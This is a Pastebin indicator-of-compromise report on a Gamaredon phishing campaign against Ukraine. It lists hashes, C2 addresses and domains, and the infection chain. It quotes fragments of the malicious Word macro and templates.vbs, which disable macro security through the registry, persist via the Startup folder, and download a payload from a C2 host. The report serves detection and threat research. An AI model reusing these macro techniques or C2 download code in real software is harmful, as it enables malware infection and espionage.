API tools faq
paste
Advertisement
VRad

#Gamaredon_181119

VRad
Nov 18th, 2019
2,129
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.85 KB | None | 0 0
raw download clone embed print report
  1. #IOC #OptiData #VR #Gamaredon #xml.rels #macro #WSH
  2.  
  3. https://pastebin.com/Vhb4KF5L
  4.  
  5. FAQ:
  6. https://radetskiy.wordpress.com/2019/11/19/ioc_gamaredon_181119/
  7. https://www.malcrawler.com/russias-gamaredon-group-new-cyber-espionage-campaign-against-ukraine/
  8. https://www.vkremez.com/2019/01/lets-learn-deeper-dive-into-gamaredon.html
  9. https://whotippedmycows.com/gamaredon-targets-ukraine-using-cve-2017-0199/
  10. https://malpedia.caad.fkie.fraunhofer.de/actor/gamaredon_group
  11.  
  12. attack_vector
  13. --------------
  14. email attach .zip > .docx > xml.rels > GET .dot > macro > DROP vbs > WSH > 3d stage ..
  15.  
  16. email_headers
  17. --------------
  18. n/a
  19.  
  20. files
  21. --------------
  22. SHA-256 76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a
  23. File name провадження.docx [Zip archive data, at least v2.0 to extract]
  24. File size 49.8 kB
  25.  
  26. SHA-256 e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8
  27. File name apu[1].dot [Composite Document File V2 Document, Little Endian, Code page: 1251]
  28. File size 47.1 kB
  29.  
  30. SHA-256 39c6884526e7b7f2ed6e47b630010508bb5957385eccf248c961cbd5bcb802c6
  31. File name templates.vbs [Little-endian UTF-16 Unicode text, with CRLF, CR line terminators]
  32. File size 8.9 kB
  33.  
  34. activity
  35. **************
  36. PL_SCR 141.8.195.60 win-apu.ddns.net [from settings.xml.rels]
  37. C2 2.59.41.5 get-icons.ddns.net [from templates.vbs]
  38.  
  39. netwrk
  40. --------------
  41. [http]
  42. 141.8.195.60 win-apu.ddns.net GET /apu.dot HTTP/1.1 Mozilla/4.0
  43. 2.59.41.5 get-icons.ddns.net GET /Host_ID//autoindex.php HTTP/1.1 Mozilla/4.0
  44.  
  45. comp
  46. --------------
  47. wscript.exe 3684 TCP localhost 49419 vds-ce34203.timeweb.ru http
  48.  
  49. proc
  50. --------------
  51. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  52. [another context]
  53. C:\Windows\system32\wbem\wmiprvse.exe -Embedding
  54. [another context]
  55. "C:\Windows\System32\WScript.exe" "C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\templates.vbs"
  56.  
  57. persist
  58. --------------
  59. C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 18.11.2019 16:17
  60. templates.vbs
  61. c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\templates.vbs
  62.  
  63. drop
  64. --------------
  65. C:\tmp\Temporary Internet Files\Content.IE5\3YAVTBAP\apu[1].dot
  66. C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\templates.vbs
  67.  
  68. @ @ @
  69. C2 (other domains, previous): from whotippedmycows.com and malcrawler.com
  70. --------------
  71. unhcr.ddns.net
  72. rnbo-ua.ddns.net
  73. network-crash.ddns.net
  74. checkhurl.site
  75. get-icons.ddns.net
  76. bitvers.ddns.net
  77. shell-sertificates.ddns.net
  78. bitread.ddns.net
  79. sv-menedgment.ddns.net
  80. lookups.ddns.net
  81. libresoft.ddns.net
  82. document-write.ddns.net
  83. suipost.ddns.net
  84. document-listing.ddns.net
  85. list-sert.ddns.net
  86. military-ua.ddns.net
  87. const-gov.ddns.net
  88. my-certificates.ddns.net
  89. checkhurl.fun
  90. libre-boot.ddns.net
  91. kristo-ua.ddns.net
  92. templates.hopto.org
  93. checkhurl.website
  94. constructor-word.ddns.net
  95. creative-office.ddns.net
  96. kornet-ua.ddns.net
  97. duktas-dde.ddns.net
  98. message-office.ddns.net
  99. unhcr.ddns.net
  100. shell-sertificates.ddns.net
  101. network-crash.ddns.net
  102. message-office.ddns.net
  103. list-sert.ddns.net
  104. libresoft.ddns.net
  105. kristo-ua.ddns.net
  106. kornet-ua.ddns.net
  107. bitread.ddns.net
  108. micro-office.ddns.net
  109. get-icons.ddns.net
  110. checkhurl.space
  111. checkhurl.info
  112. checkhurl.fun
  113. checkhurl.site
  114. underlord.site
  115. underlord.fun
  116. bitvers.ddns.net
  117. sv-menedgment.ddns.net
  118. lookups.ddns.net
  119. document-write.ddns.net
  120. suipost.ddns.net
  121. document-listing.ddns.net
  122. military-ua.ddns.net
  123. rnbo-ua.ddns.net
  124. const-gov.ddns.net
  125. my-certificates.ddns.net
  126. libre-boot.ddns.net
  127. underlord.space
  128. templates.hopto.org
  129. checkhurl.website
  130. constructor-word.ddns.net
  131. creative-office.ddns.net
  132. duktas-dde.ddns.net
  133.  
  134. @ @ @
  135. metadata of 1s docx
  136. --------------
  137. File Size : 49 kB
  138. File Modification Date/Time : 2019:11:18 12:19:29+02:00
  139. File Access Date/Time : 2019:11:19 01:52:13+02:00
  140. File Inode Change Date/Time : 2019:11:19 01:51:55+02:00
  141. File Permissions : rw-rw-r--
  142. File Type : DOCX
  143. File Type Extension : docx
  144. MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
  145. Zip Required Version : 20
  146. Zip Bit Flag : 0x0006
  147. Zip Compression : Deflated
  148. Zip Modify Date : 1980:01:01 00:00:00
  149. Zip CRC : 0x5d2e7c58
  150. Zip Compressed Size : 176
  151. Zip Uncompressed Size : 247
  152. Zip File Name : customXml/item1.xml
  153. Template : UrbanResume.Dotx
  154. Total Edit Time : 2 minutes
  155. Pages : 1
  156. Words : 111
  157. Characters : 635
  158. Application : Microsoft Office Word
  159. Doc Security : None
  160. Lines : 5
  161. Paragraphs : 1
  162. Scale Crop : No
  163. Heading Pairs : Title, 1
  164. Titles Of Parts :
  165. Company : Reanimator Extreme Edition
  166. Links Up To Date : No
  167. Characters With Spaces : 745
  168. Shared Doc : No
  169. Hyperlinks Changed : No
  170. App Version : 12.0000
  171. Creator : ШУРИК
  172. Last Modified By : ШУРИК
  173. Revision Number : 3
  174. Create Date : 2019:11:18 07:03:00Z
  175. Modify Date : 2019:11:18 07:03:00Z
  176.  
  177. @ @ @
  178. metadata of 2n dot
  179. --------------
  180. File Size : 46 kB
  181. File Modification Date/Time : 2019:11:06 14:39:21+02:00
  182. File Access Date/Time : 2019:11:19 01:51:58+02:00
  183. File Inode Change Date/Time : 2019:11:19 01:51:58+02:00
  184. File Permissions : rw-rw-r--
  185. File Type : DOT
  186. File Type Extension : dot
  187. MIME Type : application/msword
  188. Title :
  189. Subject :
  190. Author : ШУРИК
  191. Keywords :
  192. Template : apu.dot
  193. Last Modified By : ШУРИК
  194. Revision Number : 17
  195. Software : Microsoft Office Word
  196. Total Edit Time : 1.0 minutes
  197. Create Date : 2019:09:11 04:30:00
  198. Modify Date : 2019:11:18 12:18:00
  199. Pages : 1
  200. Words : 2
  201. Characters : 16
  202. Security : None
  203. Code Page : Windows Cyrillic
  204. Company : Reanimator Extreme Edition
  205. Lines : 1
  206. Paragraphs : 1
  207. Char Count With Spaces : 17
  208. App Version : 12.0000
  209. Scale Crop : No
  210. Links Up To Date : No
  211. Shared Doc : No
  212. Hyperlinks Changed : No
  213. Title Of Parts :
  214. Heading Pairs : НазваМОе, 1
  215. Comp Obj User Type Len : 39
  216. Comp Obj User Type : Äîêóìåíò Microsoft Office Word 97-2003
  217.  
  218. @ @ @
  219. drop-apu[1].dot [macro]
  220. --------------
  221. VBA MACRO ThisDocument.cls
  222. in file: f2.dot - OLE stream: u'Macros/VBA/ThisDocument'
  223. +----------+--------------------+---------------------------------------------+
  224. |Type |Keyword |Description |
  225. +----------+--------------------+---------------------------------------------+
  226. |AutoExec |Document_Open |Runs when the Word or Publisher document is |
  227. | | |opened |
  228. |Suspicious|CreateObject |May create an OLE object |
  229. |Suspicious|CreateTextFile |May create a text file |
  230. |Suspicious|ADODB.Stream |May create a text file |
  231. |Suspicious|SaveToFile |May create a text file |
  232. |Suspicious|Environ |May read system environment variables |
  233. |Suspicious|Shell |May run an executable file or a system |
  234. | | |command |
  235. |Suspicious|WScript.Shell |May run an executable file or a system |
  236. | | |command |
  237. |Suspicious|Write |May write to a file (if combined with Open) |
  238. |Suspicious|Open |May open a file |
  239. |Suspicious|Windows |May enumerate application windows (if |
  240. | | |combined with Shell.Application object) |
  241. |Suspicious|Chr |May attempt to obfuscate specific strings |
  242. | | |(use option --deobf to deobfuscate) |
  243. |Suspicious|Xor |May attempt to obfuscate specific strings |
  244. | | |(use option --deobf to deobfuscate) |
  245. |Suspicious|AccessVBOM |May attempt to disable VBA macro security and|
  246. | | |Protected View |
  247. |Suspicious|VBAWarnings |May attempt to disable VBA macro security and|
  248. | | |Protected View |
  249. |Suspicious|MSXML2.XMLHTTP |May download files from the Internet |
  250. |Suspicious|Hex Strings |Hex-encoded strings were detected, may be |
  251. | | |used to obfuscate strings (option --decode to|
  252. | | |see all) |
  253. |Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |
  254. | | |used to obfuscate strings (option --decode to|
  255. | | |see all) |
  256. |IOC |http://get- |URL |
  257. | |icons.ddns.net/ | |
  258. |IOC |templates.vbs |Executable file name |
  259. +----------+--------------------+---------------------------------------------+
  260.  
  261. @ @ @ [f2.dot _ VBA]
  262. Private Sub Document_Open()
  263.  
  264. Dim GoihGFG
  265. GoihGFG = "Set WShell=CreateObject(""WScript.Shell"")"
  266. Set rSwistz = CreateObject("WScript.Network")
  267. Set MHHEFbR = CreateObject("Scripting.FileSystemObject")
  268. jSsmRUH = MHHEFbR.Drives(Environ("SystemDrive")).SerialNumber
  269. NlnQCJG = rSwistz.ComputerName
  270. dqEBCgG$ = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & Application.Version & _
  271. "\Word\Security\"
  272. CreateObject("WScript.Shell").RegWrite dqEBCgG$ & "AccessVBOM", 1, "REG_DWORD"
  273. CreateObject("WScript.Shell").RegWrite dqEBCgG$ & "VBAWarnings", 1, "REG_DWORD"
  274. uRDEJCn = Hex(jSsmRUH)
  275. ZWyEwtz = "http://get-icons.ddns.net/" & NlnQCJG & "_" & uRDEJCn & "//autoindex.php"
  276. fQCBSyj = AppPaths + "\Microsoft\Windows\Start Menu\Programs\Startup\""+" + "RandStrinh" + "+"".exe"
  277. AREdQgT = AppPaths + "\""+ RandStrinh +" + """.txt"
  278. LaIPBvl.Write "Dim GenRandom" + vbCrLf
  279. LaIPBvl.Write "Const FoRandString = ""abcdefghijklmnopqrstuvwxyz0123456789""" + vbCrLf
  280. LaIPBvl.Write "If f.Size < 11485 Then f.Delete" + vbCrLf
  281. LaIPBvl.Write "Set HCJySbu = GetObject(""WinMgmts:{(Shutdown,RemoteShutdown)}!\\.\Root\CIMV2:Win32_OperatingSystem"")" + LaIPBvl.Close
  282. End Sub
  283.  
  284. @ @ @ [templates.vbs]
  285. Function ibiexCm(URLA)
  286. On Error Resume Next
  287. Set DfnssAH = CreateObject("MSXML2.XMLHTTP")
  288. Set PuchGYo = CreateObject( "Scripting.FileSystemObject" )
  289. Function RandomString(ByVal palvados)
  290. Dim GenRandom
  291. Const FoRandString = "abcdefghijklmnopqrstuvwxyz0123456789"
  292. Randomize
  293. For i = 1 To palvados
  294. GenRandom = GenRandom & Mid(FoRandString, Int(36 * Rnd + 1), 1)
  295. Next
  296. Set KHQCFif = CreateObject("Scripting.FileSystemObject")
  297. Set jKFUmKe = CreateObject("ADODB.Stream")
  298. jKFUmKe.SaveToFile "C:\Users
  299. ame\AppData\Roaming\"+ RandStrinh +".txt"
  300. Set f = LHswYNG.GetFile("C:\Users
  301. ame\AppData\Roaming\"+ RandStrinh +".txt")
  302. If f.Size < 11485 Then f.Delete
  303. errResult = Encode( "C:\Users
  304. ame\AppData\Roaming\"+ RandStrinh +".txt", "C:\Users
  305. ame\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"+RandStrinh+".exe", arrdqEBCgG )
  306. WScript.Sleep 6400
  307. WScript.Sleep 181040
  308. save ibiexCm("http://get-icons.ddns.net/Host_ID//autoindex.php")
  309. If PuchGYo.Fileexists("C:\Users
  310. ame\AppData\Roaming\"+ RandStrinh +".txt") Then PuchGYo.DeleteFile "C:\Users
  311. ame\AppData\Roaming\"+ RandStrinh +".txt"
  312. YDJncEX = 0
  313. Dim HCJySbu, aCRoeaK, aCRoeaKSheck
  314. Set HCJySbu = GetObject("WinMgmts:{(Shutdown,RemoteShutdown)}!\\.\Root\CIMV2:Win32_OperatingSystem")
  315. Next
  316. End If
  317. End With
  318. Loop
  319.  
  320. # # #
  321. https://www.virustotal.com/gui/ip-address/2.59.41.5/relations
  322. https://www.virustotal.com/gui/ip-address/141.8.195.60/relations
  323.  
  324. VR
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!